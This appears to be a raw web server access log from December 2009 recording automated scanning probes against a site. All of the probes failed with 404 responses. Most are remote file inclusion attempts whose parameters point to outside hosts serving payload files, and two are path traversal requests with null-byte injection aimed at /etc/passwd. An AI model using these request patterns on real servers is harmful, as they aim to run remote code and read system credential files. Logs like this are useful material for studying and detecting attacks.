125.160.17.200 - - [13/Dec/2009:09:23:34 -0800] "GET /logs/access_080410.log%20%20/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.termolar.com.br/pdfs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.66.28.36 - - [13/Dec/2009:09:24:22 -0800] "GET /logs/access_091203.log%20%20///include/mail.inc.php?skin_board_path=http://www.scss.sk/plugins/fx29id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
60.251.165.181 - - [13/Dec/2009:09:25:18 -0800] "GET /logs/access_090213.log/bbshop/shop/index.php?page=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
60.251.165.181 - - [13/Dec/2009:09:25:18 -0800] "GET /logs/bbshop/shop/index.php?page=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
60.251.165.181 - - [13/Dec/2009:09:25:18 -0800] "GET /bbshop/shop/index.php?page=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
110.45.147.248 - - [13/Dec/2009:09:26:26 -0800] "GET /logs/access_090930.log/////////?cmd&file=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
200.175.235.72 - - [13/Dec/2009:09:26:30 -0800] "GET /logs/access_090213.log%20%20/bbshop/shop/index.php?page=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
110.45.147.248 - - [13/Dec/2009:09:26:46 -0800] "GET /logs/access_090930.log/////?_SERVER[DOCUMENT_ROOT]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
200.175.235.72 - - [13/Dec/2009:09:27:20 -0800] "GET /logs/access_091021.log%20%20/bbshop/shop/index.php?page=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
